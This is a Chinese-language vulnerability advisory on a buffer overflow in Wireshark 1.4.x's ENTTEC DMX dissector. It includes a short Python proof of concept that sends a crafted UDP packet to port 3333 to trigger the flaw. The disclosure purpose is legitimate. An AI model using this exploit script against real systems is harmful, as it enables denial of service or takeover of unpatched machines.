Wireshark ENTTEC DMX数据RLE缓冲区溢出漏洞
发布日期:2010-12-31
更新日期:2011-01-05
受影响系统:Wireshark Wireshark 1.4.2
Wireshark Wireshark 1.4.1
Wireshark Wireshark 1.4.0
描述:
BUGTRAQ ID:
45634
Wireshark之前名为Ethereal,是一款非常流行的网络协议分析工具。
Wireshark在实现上存在缓冲区溢出漏洞,远程攻击者可利用此漏洞造成拒绝服务或控制受影响的系统。
由于"dissect_enttec_dmx_data()"函数(epan/dissectors/packet-enttec.c)在处理ENTTEC协议的RLE压缩的DMX数据时存在边界错误,可通过向UDP端口3333发送特制的报文造成缓冲区溢出。
<*来源:non-customers crew
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
non-customers crew ()提供了如下测试方法:
#!/usr/bin/env python
# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC
# by non-customers crew in 2010
#
http://rock-madrid.com/
import socket, sys
try:
host = sys.argv[1]
except:
print "usage: " + sys.argv[0] + " <host>"
sys.exit(2)
port = 3333
addr = (host, port)
data = "ESDD\x10\x20\x04"
data += "\x00\x0c"
data += "\xfe\xff\x41"
data += "\xfe\xff\x42"
data += "\xfe\xff\x43"
data += "\xfe\xff\x44"
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
udps.sendto(data, addr)
except:
print "can't lookup host"
sys.exit(1)
udps.close()
sys.exit(0)
建议:
厂商补丁:
Wireshark
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.wireshark.org/浏览次数:3084
严重程度:0(网友投票)
